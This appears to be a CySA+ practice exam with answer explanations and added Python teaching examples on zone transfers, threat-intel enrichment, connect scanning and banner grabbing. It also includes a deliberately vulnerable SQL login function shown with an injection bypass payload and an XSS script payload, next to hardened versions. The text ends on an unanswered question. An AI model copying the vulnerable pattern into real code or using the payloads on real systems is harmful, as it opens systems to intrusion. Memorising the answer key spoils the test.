CompTIA CySA+ (CS0-003) Practice Exam #2
What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker? Zone transfers DNS registration DNSSEC CNAME
Zone transfers A zone transfer (AXFR) copies the complete set of records for a zone from a primary DNS server to a secondary, which is how administrators keep their DNS servers synchronized. If a server answers AXFR requests from anyone, an attacker can pull the same data and obtain every hostname and address in the zone with a single query, so most administrators restrict zone transfers to known secondary servers (and often require TSIG-signed requests). DNSSEC strengthens authentication in DNS by digitally signing records with public-key cryptography; it does not copy zone data. A CNAME (Canonical Name, or alias) record is a DNS resource record stating that one domain name is an alias of another, canonical name. DNS registration is the process by which a domain owner registers a domain name and designates the name servers that are authoritative for it.
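The check a practitioner runs for this is `dig @ns1.example.com example.com AXFR` against each authoritative server. The script below is an added example (not part of the practice exam) that classifies that command's output: it tells a refused transfer from an open one and lists what an attacker would harvest from the open case. Both transcripts are constructed to look like dig output, and the hostnames and addresses in them are assumptions.

```python
"""Classify `dig ... AXFR` output: refused, or open (and what it leaks).

Added example, not from the practice exam. The two transcripts are constructed
in the shape dig prints; the zone contents are assumptions.
"""
import re

# Constructed output from a name server that correctly refuses transfers.
REFUSED = """\
; <<>> DiG 9.18.1 <<>> @ns1.example.com example.com AXFR
; (1 server found)
;; global options: +cmd
; Transfer failed.
"""

# Constructed output from a misconfigured server that lets anyone transfer the zone.
ALLOWED = """\
; <<>> DiG 9.18.1 <<>> @ns1.example.com example.com AXFR
; (1 server found)
;; global options: +cmd
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.\t\t3600\tIN\tNS\tns1.example.com.
vpn.example.com.\t3600\tIN\tA\t192.0.2.10
intranet.example.com.\t3600\tIN\tA\t10.10.5.20
backup-db.example.com.\t3600\tIN\tA\t10.10.5.21
www.example.com.\t3600\tIN\tCNAME\twebfront.example.com.
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; Query time: 12 msec
"""

# One resource record line: owner, TTL, class IN, type, rdata.
RR_LINE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>.+)$")
PRIVATE_V4 = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")


def parse_axfr(output: str) -> list:
    """Return the resource records in a dig AXFR transcript (empty if it was refused)."""
    records = []
    for line in output.splitlines():
        if line.startswith(";"):          # dig comments and status lines
            continue
        m = RR_LINE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def transfer_allowed(output: str) -> bool:
    """A completed AXFR is bracketed by two SOA records; a refusal contains none."""
    soa = [r for r in parse_axfr(output) if r["type"] == "SOA"]
    return len(soa) >= 2 and "Transfer failed" not in output


def recon_findings(output: str) -> dict:
    """What an attacker learns from an open zone: hostnames and any private addresses."""
    hosts, internal = set(), set()
    for r in parse_axfr(output):
        if r["type"] in ("A", "AAAA", "CNAME"):
            hosts.add(r["name"].rstrip("."))
        if r["type"] == "A" and PRIVATE_V4.match(r["data"]):
            internal.add(r["data"])
    return {"hosts": sorted(hosts), "internal_ips": sorted(internal)}


if __name__ == "__main__":
    for label, out in (("refused", REFUSED), ("allowed", ALLOWED)):
        print(label, transfer_allowed(out), recon_findings(out))
```

Run the real command for every NS record of the zone, not just the first: it is common for the primary to be locked down while a secondary still answers AXFR to the world.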
Which of the following policies should contain the requirements for removing a user's access when an employee is terminated? Data retention policy Account management policy Data classification policy Data ownership policy
Account management policy Account management policies describe the account life cycle from creation through decommissioning. Data ownership policies describe how ownership information is created and used. Data classification policies describe the classification structure of the data in use by an organization. Retention policies describe what data will be maintained and for how long it will be retained.
Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use? Number of false positives Mean time to remediate Alert volume Cost of incidents
Alert volume An increase in alert volume may correlate with an increase in detected incidents. By measuring this KPI, you can gain insights into the frequency of potential security incidents. While reducing false positives is important, this KPI does not directly provide information on the number of true security incidents being detected. This KPI measures how long it takes to address a security incident, not the number of incidents being detected. This KPI measures the financial impact of incidents, not their frequency or detection rate.
According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC? Malware defenses Inventory of authorized/unauthorized devices Application software security Controlled use of administrative privileges
Application software security Since the software development lifecycle (SDLC) is focused on building software applications, the best control category is application software security (Control 16, "Application Software Security," in CIS Controls v8). The other categories listed are real CIS controls with useful guidance, but they address endpoint malware, asset inventory, and privileged account use rather than practices to build into the SDLC.
What technology is NOT PKI x.509 compliant and cannot be used in various secure functions? SSL/TLS Blowfish AES PKCS
Blowfish AES, PKCS, and SSL/TLS all fit within an X.509-based PKI and are used together in everyday secure functions. SSL/TLS authenticates servers with X.509 certificates and uses the certificate's key pair during the handshake to establish session keys. PKCS (the Public-Key Cryptography Standards, for example PKCS #1 for RSA signatures and PKCS #12 for bundling a certificate with its private key) defines the formats and signature schemes X.509 certificates rely on. AES is the symmetric cipher that protects the bulk data in most TLS cipher suites once the certificate-based handshake is done. Blowfish is an older symmetric block cipher that is not part of any standard TLS cipher suite or X.509 workflow.
You've been tasked to improve the operational efficiency of your security team. One of the solutions you've proposed is to incorporate the use of plugins. How could plugins enhance your team's operations? By increasing the workload on the team By decreasing the number of tools used By extending the capabilities of existing tools By replacing current tools
By extending the capabilities of existing tools Plugins are software components that add specific features to an existing software application, enabling customization and extension of capabilities without heavy coding. Plugins typically increase the functionality of existing tools rather than decreasing the number of tools used. Effective use of plugins should ideally reduce the workload on the team by automating tasks and increasing the efficiency of existing tools, not increase it. Plugins don't typically replace existing tools, but rather, they add to or improve the functionality of those tools.
During the massive SolarWinds supply chain attack of 2020, cybersecurity professionals worldwide had to react quickly to protect their networks. A specific annual cybersecurity conference often hosts a capture-the-flag (CTF) event where participants are challenged to solve a series of real-world scenarios for practicing their incident response skills. Which conference is this? DEF CON RSA Conference Black Hat Pwn2Own
DEF CON DEF CON is one of the world's largest and most notable hacker conventions, held annually in Las Vegas, Nevada. Its capture-the-flag (CTF) event is a competitive and practical exercise in incident response. Pwn2Own is a computer hacking contest held annually at the CanSecWest security conference. However, its main focus is on discovering new vulnerabilities, not on incident response exercises. While the Black Hat conference is another renowned cybersecurity event, its primary focus is on revealing new vulnerabilities, not on practical incident response exercises like CTF. RSA Conference is a series of IT security conferences, but it does not host the capture-the-flag events for practical incident response exercises.
Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting? Machine learning Continuous integration Deep learning Data enrichment
Data enrichment Data enrichment combines, for example, a threat intelligence feed with NetFlow records so that the analyst can immediately see whether an IP address of interest is associated with a known APT, instead of looking it up by hand. Machine learning and deep learning are forms of artificial intelligence that may be used to perform enrichment, but on their own they do not describe the combining of sources that the question asks about. Continuous integration is a software development method in which code updates are tested and committed to build servers or code repositories rapidly, and is unrelated to this question.
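The NetFlow-plus-threat-feed case in the explanation, worked through as an added example (not part of the exam): flow records are joined against an intel feed whose indicators may be single hosts or whole CIDR ranges, and only enriched flows above a confidence floor are surfaced. The feed entries, the flows, and the actor names are all constructed.

```python
"""Enrich NetFlow-style records with a threat intelligence feed.

Added example for the exam explanation above; the feed, the flows and the
actor names are constructed and are not real indicators.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed threat intel feed: indicator -> attribution and context.
THREAT_FEED = {
    "198.51.100.23": {"actor": "APT-Example-1", "role": "c2", "confidence": 90},
    "203.0.113.0/24": {"actor": "Bulletproof-Hoster-X", "role": "hosting", "confidence": 60},
}

# Constructed NetFlow export (timestamp, five-tuple, byte count) as a SIEM might ingest it.
NETFLOW = """\
2024-03-01T10:00:01Z 10.0.8.15 52113 198.51.100.23 443 TCP 1840
2024-03-01T10:00:04Z 10.0.8.15 52114 93.184.216.34 443 TCP 20931
2024-03-01T10:00:09Z 10.0.9.7 41002 203.0.113.77 8080 TCP 612
2024-03-01T10:00:11Z 10.0.8.15 52115 198.51.100.23 443 TCP 1792
"""


@dataclass
class Flow:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    nbytes: int
    intel: Optional[dict] = None   # filled in by enrich()


def _compile_feed(feed: dict) -> list:
    """Turn feed keys into network objects so hosts and ranges match the same way."""
    return [(ipaddress.ip_network(k, strict=False), v) for k, v in feed.items()]


def parse_netflow(text: str) -> list:
    flows = []
    for line in text.splitlines():
        ts, src, sport, dst, dport, proto, nbytes = line.split()
        flows.append(Flow(ts, src, int(sport), dst, int(dport), proto, int(nbytes)))
    return flows


def enrich(flows: list, feed: dict = THREAT_FEED) -> list:
    """Attach the matching intel entry to every flow whose destination is an indicator."""
    compiled = sorted(_compile_feed(feed), key=lambda p: p[0].prefixlen, reverse=True)
    for f in flows:
        dst = ipaddress.ip_address(f.dst)
        for net, ctx in compiled:           # most specific prefix wins
            if dst in net:
                f.intel = {**ctx, "indicator": str(net)}
                break
    return flows


def hits(flows: list, min_confidence: int = 0) -> list:
    """Flows worth an analyst's time: enriched and at or above the confidence floor."""
    return [f for f in flows if f.intel and f.intel["confidence"] >= min_confidence]


if __name__ == "__main__":
    for f in hits(enrich(parse_netflow(NETFLOW)), 80):
        print(f.ts, f.src, "->", f.dst, f.intel["actor"], f.intel["role"])
```

The confidence floor is the part worth keeping: a raw feed join produces as many false positives as the feed has stale entries, so enrichment should carry the feed's own confidence through to whatever alerts on it.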
Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain? MITRE ATT&CK framework OpenIOC Diamond Model of Intrusion Analysis Lockheed Martin cyber kill chain
Diamond Model of Intrusion Analysis The Diamond Model provides an excellent methodology for communicating cyber events and allows analysts to derive mitigation strategies implicitly. It is built around a graphical representation of an intrusion (adversary, capability, infrastructure, victim) and its events can be chained in sequence to depict the attacker's approach alongside a kill chain. The MITRE ATT&CK framework catalogs adversary tactics and techniques with specific detection and mitigation guidance for each and ties observed behaviors back to individual threat groups, but it is a matrix rather than a graphical model of a single intrusion. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but does not deal with the specifics of how to mitigate. OpenIOC is a format for describing indicators of compromise; it captures observables from APT research but does not integrate detection and mitigation strategy.
What is a reverse proxy commonly used for? Directing traffic to internal services if the contents of the traffic comply with the policy Allowing access to a virtual private cloud To obfuscate the origin of a user within a network To prevent the unauthorized use of cloud services from the local network
Directing traffic to internal services if the contents of the traffic comply with the policy A reverse proxy is positioned at the network edge and forwards traffic to internal (or cloud-hosted) services if the contents of that traffic comply with policy. This does not require any configuration of the users' devices, but it is only possible if the application behind the proxy supports being fronted this way. You deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet; the proxy then creates the appropriate request to the internal server on the corporate network and passes the server's response back to the external client. Reverse proxies are not generally intended to obfuscate the source of communication (a forward proxy does that for its users), nor are they specific to the cloud. A cloud access security broker (CASB) is what prevents unauthorized use of cloud services from the local network.
Your organization has implemented several cybersecurity tools, but there is a lack of coordination among the team in managing and facilitating automation. Which of the following actions would most effectively address this issue? Establishing clear roles and responsibilities for managing automation Limiting team access to tools Ignoring automation Buying more tools
Establishing clear roles and responsibilities for managing automation Establishing clear roles and responsibilities ensures everyone knows who is in charge of what parts of the automation process, reducing confusion and increasing coordination. Ignoring automation would be counterproductive. Automation can help improve efficiency and free up staff to focus on more complex tasks. Limiting team access to tools can lead to silos, inhibit teamwork, and reduce overall efficiency in managing and facilitating automation. Simply buying more tools doesn't necessarily improve coordination among the team. It may add complexity and could actually worsen the issue without proper management and integration.
A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation? False positive False negative True positive True negative
False positive A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.
During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent? Delivery Reconnaissance Actions and Objectives Installation
Installation The installation of the wiper malware Destover on Sony's systems represents the Installation phase of the Cyber Kill Chain. Delivery is about transmitting the weaponized payload to the victim, not installing a payload. Actions and Objectives is when the attacker fulfills their intent, not installing a payload. Reconnaissance is about gathering information about the target system, not installing a payload.
A critical vulnerability has been identified in Kelly Nexis Analytic's primary database system, which contains sensitive customer data. It is known that this vulnerability has been exploited in similar systems by attackers. How should the organization's risk score for this vulnerability be set? Moderate High Low Not Applicable
High Given the critical nature of the vulnerability, the sensitive data involved, and the fact that the vulnerability has already been exploited in similar systems, a high risk score is appropriate. A low score would be inappropriate for a critical, actively exploited flaw. Moderate is higher than low, but the severity of the vulnerability and the evidence of exploitation warrant a higher score still. Not Applicable is never correct here: every identified vulnerability should be assigned a risk score to guide its management process.
You identified a critical vulnerability in one of your organization's databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening's change? (SELECT ALL THAT APPLY) Identify any potential risks associated with installing the patch Take the opportunity to install a new feature pack that has been requested Validate the installation of the patch in a staging environment Take the server offline at 10 pm in preparation for the change Ensure all stakeholders are informed of the planned outage Document the change in the change management system
Identify any potential risks associated with installing the patch Validate the installation of the patch in a staging environment Ensure all stakeholders are informed of the planned outage Document the change in the change management system You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).
In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent? Infrastructure Adversary Capability Victim
Infrastructure In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack.
What control provides the best protection against both SQL injection and cross-site scripting attacks? CSRF Input validation Hypervisors Network layer firewalls
Input validation Input validation rejects input that does not match the form the application expects before that input is used, and so removes the attacker's ability to smuggle SQL syntax or HTML/JavaScript into the application. That makes it a strong control against both SQL injection and cross-site scripting (in practice it is paired with parameterized queries for the database and output encoding for the browser). A network layer firewall is designed to prevent unauthorized access to the network: it blocks communications based on IP address, ports, and protocols, and cannot see whether the contents of an otherwise-permitted HTTP request are malicious. Cross-site request forgery (CSRF) is another attack type, not a control. A hypervisor manages virtual machines and isolates them from one another; it plays no part in validating application input.
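The two attacks and the controls against them, side by side, as an added example that is not from the exam. The login function is written first in the vulnerable string-building form and then with a parameterized query; the greeting is written first reflecting raw input and then with output encoding; an allow-list validator sits in front of both. The SQLite table, the user rows and the names are constructed for the example.

```python
"""SQL injection and XSS: vulnerable form beside the hardened form.

Added example for the exam explanation above. Uses an in-memory SQLite table
with constructed rows; usernames and passwords are assumptions.
"""
import html
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "battery-staple")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String-built query: attacker-controlled text becomes SQL syntax."""
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username: str, password: str) -> bool:
    """Parameterized query: the input is bound as data and never parsed as SQL."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def validate_username(username: str) -> bool:
    """Allow-list validation: anything outside the expected shape is rejected up front."""
    return USERNAME_RE.fullmatch(username) is not None


def greet_vulnerable(username: str) -> str:
    """Reflects raw input into HTML: a <script> in the name runs in the victim's browser."""
    return f"<p>Welcome, {username}!</p>"


def greet_encoded(username: str) -> str:
    """Output encoding: the same input is rendered as text, not as markup."""
    return f"<p>Welcome, {html.escape(username)}!</p>"


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    print("vulnerable login bypassed:", login_vulnerable(db, "alice", bypass))
    print("parameterized login bypassed:", login_parameterized(db, "alice", bypass))
    print("validator accepts payload:", validate_username(bypass))
    print(greet_vulnerable("<script>alert(1)</script>"))
    print(greet_encoded("<script>alert(1)</script>"))
```

Validation and the other two controls are not interchangeable: validation narrows what gets in, parameterization keeps data out of the SQL parser regardless, and encoding keeps data out of the HTML parser regardless. Defence in depth means using all three, because a field that legitimately needs characters like `'` or `<` (a surname, a comment body) cannot be protected by validation alone.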
The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, "You will regret firing me; just wait until Christmas!" He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for? Logic bomb Worm Trojan Adware
Logic bomb A logic bomb is a piece of code intentionally inserted into a software system that sets off a malicious function when specified conditions are met, such as a date or an event. For example, a programmer may hide a piece of code that starts deleting files if their account is ever removed from the company directory. The pop-up's reference to Christmas is a trigger condition, so the director is right to be concerned that a logic bomb was planted on his system or elsewhere on the network before the former employee was terminated.
Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat? MITRE ATT&CK framework Diamond Model of Intrusion Analysis Lockheed Martin cyber kill chain OpenIOC
MITRE ATT&CK framework The MITRE ATT&CK framework catalogs adversary tactics and techniques and, for each technique, provides specific detection guidance (data sources and what to look for) and mitigations, while tying observed behaviors back to individual threat groups. The Diamond Model provides an excellent methodology for communicating cyber events and allows an analyst to derive mitigation strategies implicitly. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but does not deal with the specifics of how to mitigate. OpenIOC is a format for describing indicators of compromise drawn from APT research, but it does not integrate detection and mitigation strategy.
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? SaaS PaaS IaaS MSSP
MSSP A managed security service provider (MSSP) delivers security as a service (SECaaS), including the 24/7 monitoring Nicole needs. IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. This question may seem beyond the exam scope. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company's risk response strategy? Avoidance Acceptance Mitigation Transference
Mitigation Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.
Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment? OWASP SANS SDLC NIST
NIST NIST (National Institute of Standards and Technology) produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program's establishment and provide a series of guidelines and best practices. SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). The SDLC is the software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.
Which of the following is NOT considered a phase in the incident response cycle? Detection and analysis Preparation Containment, eradication, and recovery Notification and communication
Notification and communication There are four phases in the incident response cycle as defined in NIST SP 800-61: preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity. You will notify and communicate with stakeholders throughout an incident, but that activity is not one of the four defined phases.
Which phase of the Cyber Kill Chain involves the gathering of information about the target system, its technologies, potential vulnerabilities, and users? Delivery Reconnaissance Weaponization Exploitation
Reconnaissance Reconnaissance is the initial phase of the Cyber Kill Chain that involves gathering information about the target system, its technologies, potential vulnerabilities, and users. Exploitation involves the execution of the delivered exploit, not gathering information about a target system. The weaponization phase involves packaging an exploit into a deliverable payload, not gathering information about a target system. The delivery phase involves transmitting the weaponized bundle to the victim, not gathering information about a target system.
Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system? Smartcard and PIN Username and password Password and security question Fingerprint and retinal scan
Smartcard and PIN Multi-factor authentication (MFA) creates multiple security layers to increase confidence that the user requesting access is who they claim to be, by requiring factors from at least two distinct categories. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inherence factor), something you do (action factor), or somewhere you are (location factor). By combining a smartcard (something you have) with a PIN (something you know), you have implemented multi-factor authentication. A fingerprint and retinal scan together use only one factor (inherence). A username, password, and security question together use only one factor (knowledge); a username is an identifier rather than a secret, so it does not count as a factor at all. For something to be multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inherence, location, or action.
You're an incident response team member at a prominent financial institution. A recent intrusion, such as the infamous Equifax breach, has potentially exposed customer financial data. As part of your incident response duties, you need to liaise with the legal department to address potential liabilities and discuss the way forward. What primarily makes this interaction imperative? To request additional funding for cybersecurity tools To educate them about cybersecurity To inform them of the technical details of the breach To ensure compliance with data breach laws
To ensure compliance with data breach laws Data breach laws and regulations require institutions to take certain actions in the event of a data breach, which could include notifying affected customers and regulatory bodies within a specific time frame. Though educating everyone about cybersecurity is beneficial, it's not the primary reason for communicating with the legal department in this situation. The main aim is to ensure the company's response aligns with legal requirements. Although securing funding for improved cybersecurity could be a long-term goal, it's not the primary reason to communicate with the legal department after a breach. Legal should be involved to ensure regulatory compliance and address potential liabilities. While it's important to share some details with the legal team, they typically do not need to know the intricate technical aspects of the breach. The focus should be more on legal implications and steps to manage potential liabilities.
In the 2017 Equifax breach, the credit reporting company itself had vast amounts of sensitive personal data of consumers exposed due to a flaw in their Apache Struts web-application software. In the context of the Diamond Model of Intrusion Analysis, who does Equifax represent? Infrastructure Adversary Victim Capability
Victim In the Diamond Model of Intrusion Analysis, Equifax represents the Victim as their systems and data were targeted in the breach. The Adversary is the entity conducting the attack, not the target of the attack. Infrastructure refers to the physical and virtual resources used in the attack, not the targeted entity. Capability refers to the tools and techniques used in the attack, not the targeted entity.
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment? Sandboxing Bypass testing and deploy patches directly into the production environment Choose a few existing workstations to test the patches Virtualization
Virtualization When you have limited hardware but must test across multiple operating systems, set up a virtualized environment on the one machine and test the patch against a virtual machine for each operating system before deployment; snapshots also let you revert and retest quickly. Sandboxing isolates the execution of untrusted code, but it does not give you the set of different operating systems the test requires. You should never deploy patches directly into production without testing them first in the lab, not even on just a few workstations.
Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? ftp netcat telnet wget
ftp The ftp client expects an FTP greeting from port 21 and gives you no way to send an arbitrary request to another service, so it cannot be used to grab a web server's banner. A cybersecurity analyst or penetration tester uses a banner grab to learn about a system on the network and the services running on its open ports, typically by connecting to the port, sending a minimal request (for a web server, a HEAD or GET line), and reading the service's reply. Administrators use the same technique to take inventory of the systems and services on their network. It is commonly done with telnet, wget, or netcat.
Ted, a file server administrator, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted looks up the IP address and determines that it is located in a foreign country. Ted contacts his company's security analyst, who verifies that the workstation's anti-malware solution is up-to-date, and the network's firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation? Impersonation MAC spoofing Session hijacking Zero-day
Zero-day Since the firewall is properly configured and the anti-malware solution is up to date, the most likely explanation is that a zero-day vulnerability was exploited. A zero-day vulnerability is a flaw in software that is unknown to the vendor, so no patch or detection signature has been released; attackers exploit the hole before the vendor becomes aware of it and rushes to fix it, which is why the attack is called a zero-day attack. Zero-day attacks can include the implantation of malware or spyware or other unauthorized access to user data, and signature-based defenses will not catch them.
You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? nmap -O nmap -sX nmap -sT nmap -sS
nmap -sT The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you do not have raw packet privileges on your workstation or when you are scanning an IPv6 network. This flag tells nmap to establish a full connection with the target by issuing the operating system's connect() system call instead of crafting raw SYN packets. Normally the faster -sS (SYN scan, which sends a SYN and never completes the handshake) is preferred, but it requires raw socket access on the scanning workstation. Because -sT completes the three-way handshake, the connections are also more likely to be logged by the target service. The -sX flag conducts an Xmas scan, in which the FIN, PSH, and URG flags are set. The -O flag conducts operating system detection against the target.
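Both techniques from the two explanations above (a banner grab, and the unprivileged connect scan that -sT performs) done by hand in Python, as an added example that is not part of the exam. A connect scan completes the full TCP handshake through the OS socket API, so it needs no raw-socket privileges; the banner grab then sends a minimal HTTP request and reads the Server header, exactly what netcat or telnet would show. The target is a throwaway listener on the loopback interface started by the script itself, and its banner text is constructed.

```python
"""TCP connect scan (what nmap -sT does) plus a banner grab, with no raw sockets.

Added example for the exam explanations above. The target is a loopback
listener started here; FAKE_BANNER is constructed, not a real server's reply.
"""
import socket
import threading

FAKE_BANNER = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.57 (Example)\r\nContent-Length: 0\r\n\r\n"


def start_fake_web_server() -> int:
    """Start a loopback listener that answers any request with FAKE_BANNER; return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(2)
                try:
                    if conn.recv(1024):      # scanner probes close without sending anything
                        conn.sendall(FAKE_BANNER)
                except OSError:              # timeout or peer already gone
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def find_free_port() -> int:
    """Pick a loopback port nothing is listening on, to show the 'closed' result."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Classify ports by attempting a full TCP connection, the way nmap -sT does."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                # connect_ex returns 0 on success or the errno (e.g. ECONNREFUSED) on failure.
                err = s.connect_ex((host, port))
            except OSError:                   # no answer at all: nmap would call this filtered
                results[port] = "filtered"
                continue
            results[port] = "open" if err == 0 else "closed"
    return results


def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """Send a minimal HTTP request and return the Server header, as nc/telnet would reveal it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        data = s.recv(4096).decode(errors="replace")
    for line in data.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return ""


if __name__ == "__main__":
    target = start_fake_web_server()
    print(connect_scan("127.0.0.1", [target, find_free_port()]))
    print(grab_banner("127.0.0.1", target))
```

Against a real host the open port shows up in the service's access log because the handshake completed, which is the operational cost of -sT over -sS that the explanation mentions.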
Which of the following tools could be used to detect unexpected output from an application being managed or monitored? A behavior-based analysis tool A log analysis tool A signature-based detection tool Manual analysis
A behavior-based analysis tool A behavior-based analysis tool can capture/analyze normal behavior and then alert when an anomaly occurs. Configuring a behavior-based analysis tool requires more effort to set up properly, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.
A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation? A website utilizing a self-signed SSL certificate A buffer overflow that is known to allow remote code execution An HTTP response that reveals an internal IP address A cryptographically weak encryption cipher
A buffer overflow that is known to allow remote code execution The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to prevent a security breach most effectively. While the other issues should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.
A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization's proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent? An infected workstation is attempting to reach a command and control server Malware is running on a company workstation or server A malicious insider is trying to exfiltrate information to a remote network An attacker is performing reconnaissance on the organization's workstations
